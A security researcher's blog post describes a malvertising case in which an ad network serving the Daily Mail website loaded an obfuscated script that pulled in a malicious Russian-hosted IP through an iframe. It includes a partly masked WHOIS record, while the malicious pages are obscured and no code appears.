More rogue adverts

Last night, The Register asked us to look into a reader tip in regard to the website of the Daily Mail newspaper.

While doing an initial investigation I may have not been clear as to what was happening – this blog should clear up any misunderstanding.

Investigating the affected website initially I could see nothing untoward. However, the site did have links to lots of other websites and it contained several advert related links.

Investigating further on a goat machine which has an aggressively logging webproxy, I was able to see suspicious behaviour.

At the beginning Internet Explorer loads its default homepage and then I access the affected webpage.


After half a dozen refreshes I was able to see the following. (Note that I am obscuring the malicious webpages.)


The last few IPs are known to SophosLabs as having hosted malware in the past.

So what is happening here?

  • The Daily Mail is loading adverts from various sites.
  • One of those adverts site is loading the malicious IP.

Initially, the finger of suspicion pointed at the sites preceding the bad IP. However, further investigation showed that the site was hosting the malicious code and legitimate adverts. Going to one of the bad adverts I saw a legitimate advert and when I viewed the source code:


As you can see from the above image this page references and has an obfuscated script on it. This script is detected by Sophos as Mal/ObfJS-BI in the WS1000. When the obfuscated script is decoded it loads the malicious IP via an iframe.

Doing a WHOIS lookup on this IP I saw it was hosted in Russia.

inetnum: -
descr: Colocation and virtual hosting
descr: For abuse, spam an other comliants
country: RU
admin-c: IBA-RIPE
tech-c: IBA-RIPE
source: RIPE # Filtered

person: Infobox Abuse Manager
address: 29, Viborgskaya nab.,
address: 198215 Saint Petersburg, Russia
phone: +7 812 xxxxxxx
nic-hdl: IBA-RIPE
source: RIPE # Filtered

Searching Google for the IP brings up several references to malware. Recently, SophosLabs has seen IPs in this network range associated with W32/MarioF-Gen.

We are still investigating this malicious IP and will update the blog at a later date.